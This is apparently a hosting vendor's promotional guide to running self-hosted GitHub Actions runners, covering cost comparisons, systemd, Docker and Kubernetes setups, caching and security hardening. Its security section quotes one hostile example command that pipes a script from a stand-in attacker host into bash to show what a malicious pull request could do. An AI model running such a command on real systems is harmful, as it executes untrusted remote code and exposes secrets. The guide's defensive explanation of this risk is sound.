GitHub Actions is one of the best CI/CD platforms ever shipped, but the minute bill is a different story. If your team runs more than a few hundred minutes a day of Linux jobs on private repos, the pennies per minute stack up fast — and you still get capped at 6-hour jobs, 2 vCPUs, and 7 GB of RAM on the default runner.
Self-hosted runners flip that equation. You bring the compute (a €12.49/mo DanubeData DD Small, a Kubernetes cluster, or a beefy dedicated server), GitHub brings the queue, the UI, and the workflow syntax. Same .github/workflows/*.yml files, same logs, same UX — just running on hardware you control, with the CPU, RAM, disk, and network you actually need.
This guide walks through every way to run self-hosted runners in 2026: the official actions/runner binary on a single VPS, actions-runner-controller (ARC) on Kubernetes for ephemeral autoscaling, Docker-based disposable runners, and how to secure all of it so a malicious pull request doesn't turn your build box into a crypto miner. We also break down when self-hosting actually saves you money (spoiler: almost always, past ~1,500 Linux minutes a month) and when to stick with GitHub-hosted runners.
If you're looking for how to deploy from GitHub Actions to a VPS, see our sibling guide on deploying to a VPS from GitHub Actions. This post is about running the CI jobs themselves on your VPS.
The Real Cost of GitHub-Hosted Runners
GitHub gives every account a pool of free minutes and then bills $0.008/min for Linux x64 runners on private repos. The free allowance depends on the plan:
| Plan | Free Linux minutes/month | Overage (Linux x64, 2vCPU) | Windows multiplier | macOS multiplier |
|---|---|---|---|---|
| Free | 2,000 | $0.008/min | 2x | 10x |
| Team | 3,000 | $0.008/min | 2x | 10x |
| Enterprise | 50,000 | $0.008/min | 2x | 10x |
| Public repos | Unlimited free | — | — | — |
That $0.008/min sounds cheap until you do the math. A realistic small team running CI on a handful of services:
- 8 hours of CI per day × 20 working days = 160 hours/month = 9,600 minutes
- 9,600 − 3,000 free = 6,600 billable minutes
- 6,600 × $0.008 = $52.80/month
Now add a Docker-heavy monorepo with 15 engineers:
- 30 PRs per day, each triggering 10 min of CI = 300 min/day × 22 days = 6,600 min/month
- Plus main branch builds, nightly e2e, security scans = another 10,000+ min/month
- ~16,000 minutes billable at $0.008 = $128/month just for CI
Move to a larger runner (GitHub's 8-vCPU runner is $0.032/min) and the same workload costs $512/month. The 64-vCPU runner? $0.256/min. It's not hard to find teams spending $2,000-$5,000/month on GitHub-hosted runners for heavy CI pipelines — especially once you factor in Docker builds, integration tests, and large repos.
Meanwhile, a DanubeData DD Small VPS with 4 vCPU / 8 GB RAM / 100 GB NVMe runs €12.49/month flat. Unlimited minutes. 20 TB of traffic. No 6-hour job cap. You see where this is going.
Why Self-Host? (And When Not To)
Reasons to self-host runners
- Cost. Past ~1,500 billable minutes/month, a single €12.49 VPS is cheaper than GitHub-hosted. Past 5,000 min/month the savings are 10x.
- No 6-hour job cap. GitHub-hosted jobs are killed at exactly 6 hours. Self-hosted runners have no such cap — useful for full e2e suites, large Docker builds, or Terraform plans against a giant state file.
- More CPU, RAM, disk. GitHub's default runner is 2 vCPU / 7 GB RAM / 14 GB SSD. A DanubeData DD Medium gives you 8 vCPU / 16 GB RAM / 200 GB NVMe for €24.99/month — 4x the CPU, 2x the RAM, 14x the disk, forever, not per-minute.
- Caching between runs. Your checkout, node_modules, cargo registry, Docker layer cache, Gradle dependencies — they persist on disk between runs. A warm cache turns a 12-minute cold build into a 90-second incremental one.
- Access to internal network. Private VPCs, internal package registries, staging databases — all reachable without NAT tricks or VPN gymnastics.
- Secrets never leave your box. Build secrets, signing keys, SSH keys to production — they stay on a machine you control, not a third-party shared runner.
- GPU, ARM, and exotic architectures. Need an ARM64 runner? A GPU runner for ML? Self-hosting is the only path that doesn't charge $0.07/min.
Reasons to stay on GitHub-hosted
- Public open-source repos. Public repos get unlimited free minutes. Unless you need >6h jobs or GPUs, there's no reason to self-host.
- Low volume. If you burn <1,000 min/month, GitHub-hosted is free on most plans. Don't add a VPS to your maintenance pile for nothing.
- Security paranoia for public-repo PRs. Self-hosted runners should never run untrusted code from public-repo forks. More on this below.
- No ops team. Self-hosting means patching OS, rotating runner tokens, monitoring disk fill. If you have zero operational bandwidth, stick with managed.
The Big Tradeoff: Security
This cannot be said enough: never expose a self-hosted runner to pull requests from forks on a public repository. A malicious PR can modify the workflow YAML to run arbitrary code — curl attacker.com/payload.sh | bash — on your runner, reading any secret, stealing any credential, pivoting to your internal network.
GitHub's own docs are explicit: self-hosted runners are for private repos or trusted-only workflows. If you want CI on a public repo, either keep public-repo PR jobs on GitHub-hosted runners or gate self-hosted jobs with a guard like this:
jobs:
build:
# Only run self-hosted for PRs from the same repo (not forks)
if: github.event.pull_request.head.repo.full_name == github.repository
runs-on: [self-hosted, linux, danubedata]
steps:
- uses: actions/checkout@v4
- run: make build
Combine that with ephemeral runner mode (one job, then the runner tears down) so a malicious job can't persist state across runs. We'll cover both below.
Your Four Self-Hosted Runner Options
There are four production-grade ways to run self-hosted runners in 2026:
| Option | Best for | Complexity | Ephemeral? |
|---|---|---|---|
1. actions/runner + systemd |
Single VPS, small teams, stable hardware caches | Low | Optional |
| 2. actions-runner-controller (ARC) | K8s shops, autoscaling, ephemeral-by-default | Medium-High | Yes (ephemeral pods) |
3. myoung34/docker-github-actions-runner |
Docker-only hosts, quick iteration | Low | Yes (container per job) |
4. runs-on (self-hosted orchestrator) |
AWS-heavy teams wanting spot autoscaling | Medium | Yes |
Third-party managed services like BuildJet, Blacksmith, and Namespace also exist — they're "self-hosted runner as a service" where someone else maintains the infrastructure. Faster than GitHub-hosted, usually cheaper, but you're back to paying per-minute and trusting a third party. We don't cover those here because this guide is about running CI on hardware you own.
For the majority of teams on a DanubeData VPS, Option 1 or Option 3 is the right starting point. Jump to Option 2 once you have a Kubernetes cluster and >50 CI jobs per hour. Let's build all three.
Hardware Sizing: Which DanubeData VPS?
| Workload | Recommended plan | Specs | Price |
|---|---|---|---|
| Node.js/JS unit tests, small Python projects | DD Nano or DD Micro | 2 vCPU / 2-4 GB / 40-60 GB | €4.49 - €7.49/mo |
| Docker builds, Go, small Rust, Laravel CI | DD Small | 4 vCPU / 8 GB / 100 GB NVMe | €12.49/mo |
| Heavy Docker + integration tests, moderate monorepo | DD Medium | 8 vCPU / 16 GB / 200 GB NVMe | €24.99/mo |
| Large monorepo, Rust full rebuilds, ML jobs, K8s host | DD Large | 16 vCPU / 32 GB / 400 GB NVMe | €49.99/mo |
For the rest of this guide we'll assume DD Small (€12.49/mo), which is the sweet spot for 90% of teams — 4 dedicated AMD EPYC vCPU threads, 8 GB RAM, 100 GB of dedicated NVMe, and 20 TB of included traffic. It outperforms GitHub's default 2-vCPU runner by ~2x on Docker builds and by ~4x on parallelizable Go/Rust compilation.
Option 1: Standard actions/runner on a Single VPS
This is the simplest path and the one you'll want to start with. One runner, one VPS, systemd to keep it alive, labels so only your jobs target it.
Step 1: Provision the VPS
- Head to danubedata.ro/vps/create and launch a DD Small
- Pick Ubuntu 24.04 LTS (we'll use systemd and Docker, both are first-class)
- Use a new €50 signup credit — that covers 4 months of the DD Small free
- Note the public IPv4
Step 2: Harden the base system
# SSH in as root
ssh root@YOUR_VPS_IP
# Full update
apt update && apt upgrade -y
# Install essentials
apt install -y curl wget git ufw jq build-essential ca-certificates unzip
# Basic firewall — only SSH inbound, runner is outbound-only
ufw default deny incoming
ufw default allow outgoing
ufw allow OpenSSH
ufw --force enable
# Create a dedicated non-root user for the runner
# NEVER run the runner as root — any malicious build step gets root too
adduser --disabled-password --gecos "" actions
usermod -aG sudo actions
Note the firewall: GitHub Actions runners are outbound-only. They poll GitHub's API over HTTPS for new jobs. You don't need to open any inbound ports, which means the runner is not reachable from the public internet at all. Nice side effect of how the protocol works.
Step 3: Install Docker (so jobs can use docker build)
# Install Docker Engine + Compose plugin
curl -fsSL https://get.docker.com | sh
apt install -y docker-compose-plugin
# Let the runner user talk to Docker without sudo
usermod -aG docker actions
# Verify
sudo -u actions docker run --rm hello-world
Step 4: Download the runner binary
GitHub publishes a pre-built runner binary for Linux x64. You can grab it from the repo/org settings page, but it's easier to script.
# Switch to the runner user
su - actions
# Create runner directory
mkdir ~/actions-runner && cd ~/actions-runner
# Get the latest runner version dynamically
RUNNER_VERSION=$(curl -s https://api.github.com/repos/actions/runner/releases/latest | jq -r '.tag_name | sub("^v"; "")')
echo "Installing runner $RUNNER_VERSION"
# Download
curl -o actions-runner-linux-x64.tar.gz -L
"https://github.com/actions/runner/releases/download/v${RUNNER_VERSION}/actions-runner-linux-x64-${RUNNER_VERSION}.tar.gz"
# Extract
tar xzf actions-runner-linux-x64.tar.gz
# Verify
ls -la config.sh run.sh
Step 5: Register the runner with GitHub
In your GitHub repo (or org, for reuse across many repos), go to Settings → Actions → Runners → New self-hosted runner. GitHub will give you a one-time registration token that looks like AABBCC...XYZ. Copy it.
# Still as the 'actions' user, in ~/actions-runner
./config.sh
--url https://github.com/YOUR_ORG/YOUR_REPO
--token YOUR_REGISTRATION_TOKEN
--name "danubedata-dd-small-01"
--labels "self-hosted,linux,x64,danubedata,docker"
--work "_work"
--unattended
--replace
The --labels flag matters a lot. These labels are how your workflow files select this runner. We add danubedata and docker as custom labels so you can target this specific runner pool in your YAML.
For org-level runners (available across many repos), use the org URL https://github.com/YOUR_ORG and request an org registration token from Org Settings → Actions → Runners.
Step 6: Run as a systemd service
# Back to root (exit from 'actions' user first)
exit
# The runner ships with a helper that installs a systemd unit
cd /home/actions/actions-runner
./svc.sh install actions
./svc.sh start
# Check status
./svc.sh status
systemctl status actions.runner.YOUR_ORG-YOUR_REPO.danubedata-dd-small-01.service
The unit will be named actions.runner.ORG-REPO.RUNNER_NAME.service and systemd will auto-restart it if the runner crashes or the VPS reboots. Logs land in journalctl:
journalctl -u 'actions.runner.*' -f
Step 7: Target the runner in your workflow
name: CI
on:
push:
branches: [main]
pull_request:
branches: [main]
jobs:
test:
# Any runner with ALL of these labels
runs-on: [self-hosted, linux, danubedata, docker]
steps:
- uses: actions/checkout@v4
- name: Set up Node
uses: actions/setup-node@v4
with:
node-version: '20'
cache: 'npm'
- run: npm ci
- run: npm run lint
- run: npm test
- name: Build Docker image
run: docker build -t myapp:${{ github.sha }} .
Push that to GitHub, open the Actions tab, and you should see the job pick up on your new runner within a few seconds. Congratulations — you just saved yourself $0.008/min.
Step 8: Ephemeral mode (strongly recommended)
By default the runner is persistent: it stays registered and picks up job after job. That's fast, but it also means any file a job writes (tempfiles, caches, malicious payloads) persists to the next job.
Ephemeral mode makes the runner handle exactly one job and then exit. Combined with a systemd restart, you get a fresh runner per job:
# Re-configure with --ephemeral
./config.sh remove --token YOUR_REMOVAL_TOKEN
./config.sh
--url https://github.com/YOUR_ORG/YOUR_REPO
--token YOUR_NEW_REGISTRATION_TOKEN
--name "danubedata-dd-small-01"
--labels "self-hosted,linux,x64,danubedata,docker"
--work "_work"
--ephemeral
--unattended
--replace
Then wrap the runner in a loop so systemd re-registers and restarts after each job. Simpler though: use Option 3 (Docker) or Option 2 (ARC) — both are ephemeral by default.
Option 3: Docker-Based Ephemeral Runners with myoung34/docker-github-actions-runner
If all your jobs run inside containers anyway, skip the systemd dance and run the runner itself as a container. The community image myoung34/docker-github-actions-runner is the de-facto standard for this.
Step 1: Create a GitHub App or PAT for auto-registration
Docker runners auto-register on startup using either a GitHub App private key or a Personal Access Token with repo + workflow + admin:org (for org-level runners) scope. App-based auth is better for production — finer-grained permissions, auditable, rotatable.
For this quick guide we'll use a PAT. Create one at https://github.com/settings/tokens with the repo scope (for repo-level) or admin:org (for org-level). Save as GH_RUNNER_TOKEN.
Step 2: Compose file with three ephemeral workers
# /opt/runners/docker-compose.yml
services:
runner-1:
image: myoung34/github-runner:ubuntu-noble
restart: always
environment:
REPO_URL: https://github.com/YOUR_ORG/YOUR_REPO
RUNNER_NAME: danubedata-docker-01
RUNNER_SCOPE: repo # or "org"
LABELS: self-hosted,linux,x64,danubedata,docker,ephemeral
ACCESS_TOKEN: ${GH_RUNNER_TOKEN}
EPHEMERAL: "true"
DISABLE_AUTO_UPDATE: "true"
volumes:
- /var/run/docker.sock:/var/run/docker.sock
- runner-1-work:/_work
security_opt:
- no-new-privileges:true
runner-2:
image: myoung34/github-runner:ubuntu-noble
restart: always
environment:
REPO_URL: https://github.com/YOUR_ORG/YOUR_REPO
RUNNER_NAME: danubedata-docker-02
RUNNER_SCOPE: repo
LABELS: self-hosted,linux,x64,danubedata,docker,ephemeral
ACCESS_TOKEN: ${GH_RUNNER_TOKEN}
EPHEMERAL: "true"
volumes:
- /var/run/docker.sock:/var/run/docker.sock
- runner-2-work:/_work
runner-3:
image: myoung34/github-runner:ubuntu-noble
restart: always
environment:
REPO_URL: https://github.com/YOUR_ORG/YOUR_REPO
RUNNER_NAME: danubedata-docker-03
RUNNER_SCOPE: repo
LABELS: self-hosted,linux,x64,danubedata,docker,ephemeral
ACCESS_TOKEN: ${GH_RUNNER_TOKEN}
EPHEMERAL: "true"
volumes:
- /var/run/docker.sock:/var/run/docker.sock
- runner-3-work:/_work
volumes:
runner-1-work:
runner-2-work:
runner-3-work:
# Deploy
cd /opt/runners
echo "GH_RUNNER_TOKEN=ghp_xxxxxxxxxxxxxxxx" > .env
chmod 600 .env
docker compose up -d
# Watch them register
docker compose logs -f
You now have 3 parallel runners on a single DD Small, each ephemeral, each auto-replacing itself after a job. On an 8 GB / 4 vCPU box you can comfortably run 3-4 parallel CI jobs for typical Node/Python workloads. For Docker-heavy pipelines, 2 concurrent runners is the sweet spot.
Security note: the Docker socket mount
Mounting /var/run/docker.sock into the runner gives it full control of the Docker daemon — which is effectively root on the host. Acceptable for trusted private repos, dangerous for anything that might run untrusted code. Alternatives:
- Docker-in-Docker (dind): run a nested Docker daemon inside the runner container. Slower but isolates host from builds.
- Rootless Docker: the
myoung34/github-runner:ubuntu-noble-dind-rootlessvariant runs dind as a non-root user. - Podman: drop-in Docker replacement that's rootless by default.
Option 2: actions-runner-controller (ARC) on Kubernetes
Once you need more than ~10 concurrent runners, static Docker containers stop being the right answer. You want autoscaling to zero — runners that only exist for the duration of a single job, with the Kubernetes scheduler placing them across your node pool based on current demand.
This is what actions-runner-controller (ARC) does. It's the official GitHub-supported Kubernetes operator, maintained by GitHub itself since 2023.
If you're running a k3s cluster on 2-3 DanubeData VPS nodes (e.g., a DD Medium as control plane + two DD Small workers = €49.97/month for a 12-vCPU cluster), ARC turns all that capacity into an elastic runner pool.
Architecture
- Runner Scale Sets: a pool of runners bound to an org or repo, identified by a name like
arc-danubedata - Ephemeral pods: each job spawns a fresh pod, which runs the job, then the pod is deleted
- Scale to zero: when no jobs are queued, there are zero runner pods
- Scale up on demand: when jobs queue up, ARC creates pods until
maxRunnersis hit
Step 1: Install ARC
# Install the controller itself
helm install arc
--namespace arc-systems
--create-namespace
oci://ghcr.io/actions/actions-runner-controller-charts/gha-runner-scale-set-controller
# Verify
kubectl get pods -n arc-systems
Step 2: Create a GitHub App for ARC
ARC authenticates to GitHub via a GitHub App (strongly recommended) or PAT. Go to Org Settings → Developer settings → GitHub Apps → New GitHub App. Grant these permissions:
- Actions: Read and write
- Administration: Read and write
- Self-hosted runners: Read and write
- Metadata: Read-only
Install the app on your org, generate a private key (.pem file), and save the App ID + Installation ID + private key as a Kubernetes secret:
kubectl create namespace arc-runners
kubectl create secret generic arc-github-app
--namespace arc-runners
--from-literal=github_app_id=123456
--from-literal=github_app_installation_id=7890123
--from-file=github_app_private_key=./arc-private-key.pem
Step 3: Deploy a Runner Scale Set
# arc-scale-set.yaml
# Deploy with: helm install arc-danubedata ... -f arc-scale-set.yaml
githubConfigUrl: "https://github.com/YOUR_ORG"
githubConfigSecret: arc-github-app
minRunners: 0
maxRunners: 10
runnerScaleSetName: danubedata
containerMode:
type: "dind" # Docker-in-Docker
template:
spec:
containers:
- name: runner
image: ghcr.io/actions/actions-runner:latest
command: ["/home/runner/run.sh"]
resources:
requests:
cpu: "500m"
memory: "1Gi"
limits:
cpu: "2"
memory: "4Gi"
helm install arc-danubedata
--namespace arc-runners
-f arc-scale-set.yaml
oci://ghcr.io/actions/actions-runner-controller-charts/gha-runner-scale-set
# Verify
kubectl get autoscalingrunnerset -n arc-runners
kubectl get pods -n arc-runners -w
Step 4: Target the scale set in workflows
jobs:
build:
runs-on: danubedata # the runnerScaleSetName from the Helm values
steps:
- uses: actions/checkout@v4
- run: make ci
Push a commit and watch ARC spin up a fresh pod for the job, then delete it after. Queue 10 jobs at once and ARC will create 10 pods in parallel (up to maxRunners), completing the whole pipeline in the time of a single job. When idle, zero pods, zero overhead.
This is also the answer to "how do I get ephemeral, fork-safe runners for a public repo": ARC pods are short-lived containers with no persistent state, which dramatically reduces the blast radius if a malicious PR slips through. Combine with the PR guard we showed earlier and you have a production-grade setup.
Option 4: runs-on and other orchestrators
For completeness: runs-on is a clever open-source orchestrator that runs self-hosted runners on AWS EC2 spot instances. Sophisticated autoscaling, startup in ~30s, billed by AWS (often cheaper than GitHub-hosted even with spot pricing). It's AWS-specific though, so less relevant for a DanubeData guide.
If you want similar orchestration on Hetzner/DanubeData, ARC with the Kubernetes Cluster Autoscaler + Hetzner's cloud-controller-manager is the closest equivalent — and since DanubeData runs on Hetzner bare metal, you're already in that ecosystem.
Caching: The Self-Hosted Runner Superpower
On a GitHub-hosted runner, every job starts from a clean VM. That means downloading every dependency, every time. actions/cache helps, but the cache is remote — you're pulling 500 MB of node_modules over HTTPS on every run.
On a self-hosted runner, caches can live on local disk, surviving between jobs. A warm cache turns minutes into seconds.
Strategy 1: actions/cache still works
The built-in actions/cache action works on self-hosted runners, but by default it uploads to GitHub's cache service (10 GB quota per repo). For local-first caching, configure it to use a local directory:
- name: Cache node_modules
uses: actions/cache@v4
with:
path: ~/.npm
key: ${{ runner.os }}-node-${{ hashFiles('**/package-lock.json') }}
Because the runner's home directory is the same host between runs (unless ephemeral), ~/.npm stays warm naturally. The cache action just tracks what's in it.
Strategy 2: Shared host volume for ephemeral runners
If you use ephemeral Docker runners, each job is a fresh container — nothing persists by default. Mount a shared cache volume to every runner:
services:
runner-1:
image: myoung34/github-runner:ubuntu-noble
volumes:
- /var/run/docker.sock:/var/run/docker.sock
- /opt/ci-cache:/cache # shared host path
environment:
EPHEMERAL: "true"
# ...
Then in your workflow:
- name: Symlink caches to shared volume
run: |
mkdir -p /cache/npm /cache/docker
ln -sfn /cache/npm ~/.npm
ln -sfn /cache/docker ~/.docker
This gives you a persistent cache across ephemeral jobs. Downside: concurrent jobs can race on the cache directory. A locking wrapper or per-job subdirectory solves it (/cache/${{ github.sha }}).
Strategy 3: Docker BuildKit + registry cache
For Docker builds specifically, docker buildx build --cache-from type=registry pushes layer caches to any OCI registry (GHCR, Harbor, GitLab, or even MinIO on the same VPS). Works across runners and reboots:
- name: Set up Buildx
uses: docker/setup-buildx-action@v3
- name: Build with registry cache
uses: docker/build-push-action@v5
with:
context: .
push: true
tags: ghcr.io/${{ github.repository }}:${{ github.sha }}
cache-from: type=registry,ref=ghcr.io/${{ github.repository }}:buildcache
cache-to: type=registry,ref=ghcr.io/${{ github.repository }}:buildcache,mode=max
Cost Comparison: GitHub-Hosted vs DanubeData Self-Hosted
| Usage profile | Monthly Linux minutes | GitHub-hosted (Team, 3k free) | DanubeData DD Small | DanubeData DD Medium | Annual savings vs GH |
|---|---|---|---|---|---|
| Solo dev, small project | 500 min | $0 (free tier) | €12.49 | €24.99 | -€150 (stay on GH) |
| Small team, light CI | 2,000 min | $0 (free tier) | €12.49 | €24.99 | Break-even |
| Team, moderate CI | 8,000 min | $40/mo ($480/yr) | €12.49 (€150/yr) | €24.99 (€300/yr) | ~$330/yr |
| Team, heavy CI / Docker | 20,000 min | $136/mo ($1,632/yr) | €12.49 (€150/yr) | €24.99 (€300/yr) | ~$1,330/yr |
| Monorepo, integration tests | 50,000 min | $376/mo ($4,512/yr) | €12.49 (€150/yr) | €24.99 (€300/yr) | ~$4,200/yr |
| Large team, 4x larger runner ($0.032/min) | 30,000 min | $864/mo ($10,368/yr) | DD Large €49.99 (€600/yr) | 2× DD Large €99.98 (€1,200/yr) | ~$9,500/yr |
Break-even is around 3,500-5,000 billable Linux minutes per month. Below that, GitHub-hosted is fine. Above that, self-hosting on a DanubeData VPS saves 80-95% and gives you more CPU, RAM, and disk per euro than any managed runner service on the market.
Security Hardening Checklist
If you take away one thing from this guide, it's this: self-hosted runners run untrusted code in the context of whoever you let push to the repo. Treat the runner like a production server that occasionally runs arbitrary scripts, because that's exactly what it is.
- Never run the runner as root. Use a dedicated
actionsuser. Revoke sudo if possible after setup. - Always use ephemeral mode for public repos. Or just don't use self-hosted on public repos at all.
- Gate fork PRs.
if: github.event.pull_request.head.repo.full_name == github.repositoryon every self-hosted job. - Firewall outbound too. A compromised runner will try to exfiltrate data. Consider an egress allowlist if you're paranoid (Cilium or nftables).
- Rotate registration tokens. GitHub registration tokens are short-lived (~1 hour). For long-lived runners, use a GitHub App with rotatable keys.
- Separate per-repo or per-team runners. Don't share one VPS across your whole org — blast radius should match trust boundaries.
- Mount
/var/run/docker.sockonly if you trust every workflow on that repo. Otherwise use rootless dind. - Pin action versions to SHA, not tags.
uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11, not@v4. - Restrict GITHUB_TOKEN permissions. Default to
permissions: {}and grant only what each job needs. - Monitor disk fill. Runners leak
_workdirectories. Cron job to clean_work/*/*older than 24h. - Set up fail2ban on SSH. Standard VPS hygiene.
- Use
no-new-privilegesin Docker. Prevents setuid escalations inside containers.
Operational Essentials
Disk cleanup cron
Runners accumulate _work/<repo>/<repo> directories forever. Add to the runner user's crontab:
# Weekly cleanup — runner will re-checkout on next job
0 3 * * 0 find /home/actions/actions-runner/_work -maxdepth 2 -mindepth 2 -mtime +3 -exec rm -rf {} +
Docker prune
# Run as root or docker-group user
docker system prune -af --volumes --filter "until=72h"
Schedule daily. Docker layer caches can eat 50-100 GB in a week on a busy runner.
Monitoring
Install node_exporter + scrape from an existing Prometheus, or use a lightweight cloud agent. Key metrics:
- Disk free on
/home/actions— alert at <15% free - Load average — sustained >1.5x vCPU count means upgrade
- Memory pressure — OOMs will silently kill runner jobs
- Runner last-heartbeat — GitHub marks a runner offline after ~1 min of no heartbeat
Updating the runner binary
If you left DISABLE_AUTO_UPDATE=false, the runner self-updates in place whenever GitHub pushes a new release. Nice, but means the binary running code is not reproducible. For production-grade pipelines, set DISABLE_AUTO_UPDATE=true and update deliberately:
systemctl stop 'actions.runner.*'
su - actions
cd ~/actions-runner
./svc.sh stop
# Re-download and extract latest release (see Step 4 above)
./svc.sh start
FAQ
Is it safe to run self-hosted runners for public repositories?
Not out of the box, and not with persistent runners. GitHub explicitly warns against it — any pull request from a fork can modify the workflow and execute arbitrary code on your runner. If you must, use ephemeral runners in a locked-down container (Option 2 or 3), guard every job with if: github.event.pull_request.head.repo.full_name == github.repository, and consider using the pull_request_target event with extreme care. For most public projects, keep public-repo CI on GitHub-hosted and self-host only the private infrastructure workflows.
What's the break-even point vs GitHub-hosted runners?
Roughly 3,500-5,000 billable Linux minutes per month on the $0.008/min tier. Below that, the free allowance + low overage cost makes GitHub-hosted more economical. Above that, a single €12.49 DD Small VPS pays for itself within the first week of the month. The break-even drops dramatically (to ~500 min) if you're using the 4x/8x/16x larger GitHub-hosted runners, because those bill 4-16× the base rate.
How do I cache dependencies effectively on a self-hosted runner?
Three layers, best used together: (1) actions/cache still works and pushes to GitHub's cache service — useful for cross-runner caching. (2) Local host caches — ~/.npm, ~/.cargo, ~/.gradle persist on a persistent runner for free. (3) Registry-based Docker BuildKit caching (--cache-from type=registry) — best for Docker layer caching across ephemeral runners. For ephemeral Docker runners, mount a shared host volume like /opt/ci-cache:/cache and symlink dependency directories into it at the start of each job.
Can I run Windows or macOS self-hosted runners on a DanubeData VPS?
DanubeData VPS instances run KubeVirt/KVM-backed Linux by default. Windows is technically possible on a DD Medium or DD Large by providing your own licensed Windows ISO — the actions/runner binary has native Windows builds. macOS self-hosted runners require Apple hardware due to Apple's licensing terms; you cannot legally virtualize macOS on non-Apple hardware. For macOS CI you either use GitHub-hosted (expensive at 10× multiplier), a dedicated Mac mini colo, or a macOS-specific cloud like MacStadium.
How do I scale from one runner to many?
Three strategies in order of complexity. (1) Multiple runners on one VPS — run 2-4 parallel runners on a DD Small, labeled with distinct names. Works until you hit CPU/RAM contention. (2) Multiple VPS instances — provision 3 DD Smalls, register each with the same label danubedata, and GitHub load-balances jobs across them. (3) Kubernetes + ARC — a k3s cluster on DanubeData VPSes with autoscaling runner scale sets. Scale to zero when idle, to hundreds of pods under load. ARC is the right call past ~10 concurrent runners.
What's the maintenance burden, realistically?
Plan for 1-2 hours per month on a well-configured setup: (1) OS updates — run unattended-upgrades on Ubuntu so security patches apply automatically. (2) Runner binary updates — ~monthly, 5 min each. (3) Disk cleanup — cron handles it, but check quarterly. (4) Token rotation if using PATs — monthly or use a GitHub App and forget about it. (5) Monitoring alerts — if you have Prometheus already, adding runner metrics is ~30 min one-time. The big ongoing cost is attention during incidents: if a runner gets stuck, jobs queue. A healthy setup alerts you before users notice.
Can I mix self-hosted and GitHub-hosted runners in the same pipeline?
Yes, and it's the recommended pattern. Route heavy jobs (Docker builds, integration tests, long-running workflows) to self-hosted via runs-on: [self-hosted, linux, danubedata], and keep lightweight jobs (linting, markdown checks, docs build) on runs-on: ubuntu-latest. You get cost savings where it matters and GitHub's clean-slate guarantee where you need it.
What happens to queued jobs if my runner VPS crashes?
Jobs stay queued in GitHub's control plane indefinitely until a matching runner picks them up or the workflow is cancelled (workflows time out after 35 days by default). When your runner reconnects, it picks up the next queued job. This is why redundancy matters — run at least 2 runners, and if you run just one, make sure systemd restart-on-failure is configured. With ARC on Kubernetes, losing one node only loses the pods on that node — the controller immediately reschedules onto healthy nodes.
Get Started Today
The fastest path to cutting your GitHub Actions bill in half:
- Create a DD Small VPS on DanubeData (€12.49/mo, €50 signup credit = 4 months free)
- Follow Option 1 above — it's ~20 minutes of work, end to end
- Point your most expensive CI workflow at
runs-on: [self-hosted, linux, danubedata] - Watch your monthly bill from GitHub drop from three digits to zero
Why DanubeData for self-hosted runners:
- AMD EPYC dedicated vCPUs — faster compile times than GitHub's shared runners
- Dedicated NVMe storage — cache-friendly I/O, no noisy neighbors
- 20 TB of traffic per VPS — pull all the Docker images you want
- German data center — GDPR-aligned, EU-sovereign
- Flat €12.49/mo for DD Small, €24.99 for DD Medium, €49.99 for DD Large — no per-minute billing, ever
- IPv4 + IPv6, KVM virtualization, snapshots built in
Ready to reclaim your CI budget? Spin up your runner VPS now and claim the €50 signup credit.
Have a heavy CI workload and want architecture advice on ephemeral runners, ARC, or caching strategies? Reach out to our team — we've helped teams migrate from $2,000/month GitHub Actions bills to €50/month DanubeData deployments.